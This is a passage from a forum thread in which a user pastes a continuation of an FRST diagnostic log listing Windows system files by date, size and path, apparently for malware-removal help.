2016-12-03 08:34 - 2016-12-03 08:34 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\npmproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\NETSTAT.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksetup.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcfghost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\cnvfat.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACCTRES.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00039696 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppinst.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\WcnEapPeerProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvidc32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastInputMgr.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-kernel-pnp-events.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\dtsh.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00039272 _____ (Microsoft Corporation) C:\WINDOWS\system32\msgsm32.acm
2016-12-03 08:34 - 2016-12-03 08:34 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rrinstaller.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\system32\XInput1_4.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcpmib.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxstrace.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\system32\scrnsave.scr
2016-12-03 08:34 - 2016-12-03 08:34 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcsubs.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxpps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ddodiag.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmcfg32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00038760 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfpmp.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmprovhost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SEMgrPS.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasphone.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\format.com
2016-12-03 08:34 - 2016-12-03 08:34 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\esevss.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialer.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\credwiz.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00038160 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_02_15b3.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00037888 ____R (Microsoft Corporation) C:\WINDOWS\system32\MixedRealityCapture.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnsruprov.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\WcnEapAuthProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\tvratings.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwlauncher.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToStatusProvider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\hid.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\BackgroundTransferHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\witnesswmiv2provider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsTelemetry.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\klist.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\icacls.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\dusmtask.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBCAMD2.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\cliconfg.rll
2016-12-03 08:34 - 2016-12-03 08:34 - 00037136 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfmifs.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\w32topl.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\vidcap.ax
2016-12-03 08:34 - 2016-12-03 08:34 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncInfrastructureps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SetProxyCredential.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\FdDevQuery.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSetupStatusProvider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\auditpol.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadauthhelper.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdhcinst.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\pots.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\iscsium.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\FDResPub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\IndirectKmd.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\filetrace.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceDisplayStatusManager.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\datusage.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\canonurl.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Apphlpdm.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00036112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdi.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuautoappupdate.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Workplace.WorkplaceSettings.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\spaceman.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\snmpapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgentc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\RacEngn.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnpui.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\pifmgr.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthMtpContextHandler.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035672 _____ (Microsoft Corporation) C:\WINDOWS\system32\NtlmShared.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035576 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserAccountBroker.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\UsoClient.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ThumbnailExtractionHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\tapilua.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxssrv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\netcfg.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\licmgr10.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipconfig.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\hidserv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\findstr.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\extrac32.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevQueryBroker.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSoftwareInstallationClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\choice.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00035088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cnghwassist.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\WofUtil.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.WebPlatform.SecurityBroker.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpgradeResultsUI.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\tbauth.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\proquota.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhf.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00034576 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_02_1969.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Diskdump.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcnsh.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwsso.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\RNDISMP.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmOmaCpMo.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzSqlExt.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00034064 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSaveTask.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\shimgvw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\ndproxystub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\luiapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnscacheugc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmNotificationBroker.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\cofiredm.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winrnr.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\userinit.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\httpapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\fsutilext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsparse.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmprocessxmlfiltered.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\cacls.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthTelemetry.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033040 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationFrameworkPS.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00033040 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_0C_8086.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\syskey.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ifmon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ias.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbrpm.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptdlg.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\bthpanapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\atlthunk.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032544 _____ (Microsoft Corporation) C:\WINDOWS\system32\imaadp32.acm
2016-12-03 08:34 - 2016-12-03 08:34 - 00032416 _____ (Microsoft Corporation) C:\WINDOWS\system32\mrt_map.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAgent.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemEventsBrokerClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\nsisvc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mode.com
2016-12-03 08:34 - 2016-12-03 08:34 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FaxPrinterInstaller.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00032016 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfpmp.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031992 _____ (Microsoft Corporation) C:\WINDOWS\system32\reguwpapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031992 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdmo.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mrt100.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft) C:\WINDOWS\system32\usk.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Background.TimeBroker.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ureg.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\timeout.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxdm.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msisip.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\fltMC.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\elsTrans.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsdport.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\DDOIProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\cscdll.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\APHostRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031504 _____ (Microsoft Corporation) C:\WINDOWS\system32\SDFHost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wimmount.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00031504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Dumpata.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00031480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msadp32.acm
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\shunimpl.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\RpcPing.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\netiougc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpupdate.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdWNet.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tape.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msfs.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Dot3Conn.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\clip.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\cliconfg.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\at.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmiprop.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidres.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModelShim.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcalua.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAMRNBSink.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\mciwave.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerSvc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmpbk32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\SpatialGraphFilter.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToStatusProvider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Provisioning.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxsstore.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\setspn.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlmproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\mciseq.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\easinvoker.proxystub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairingProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\bi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeevts.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\shgina.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\prevhost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.drv
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\MemoryDiagnostic.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmoleaututils.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\dispex.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\CheckNetIsolation.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00029432 _____ (Microsoft Corporation) C:\WINDOWS\system32\winnsi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029432 _____ (Microsoft Corporation) C:\WINDOWS\system32\avrt.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029184 _____ (Microsoft Corporation) C:\WINDOWS\system32\DsmUserTask.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00029184 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmdext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00029184 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallButtons.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfvfw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\winrshost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.SystemManufacturers.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wephostsvc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\msyuv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\lmhsvc.dll

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
    • View Profile
Re: File Type Question
« Reply #31 on: January 25, 2017, 08:57:07 PM »
17th continuation of FRST

2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\dswave.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\asyncmac.sys
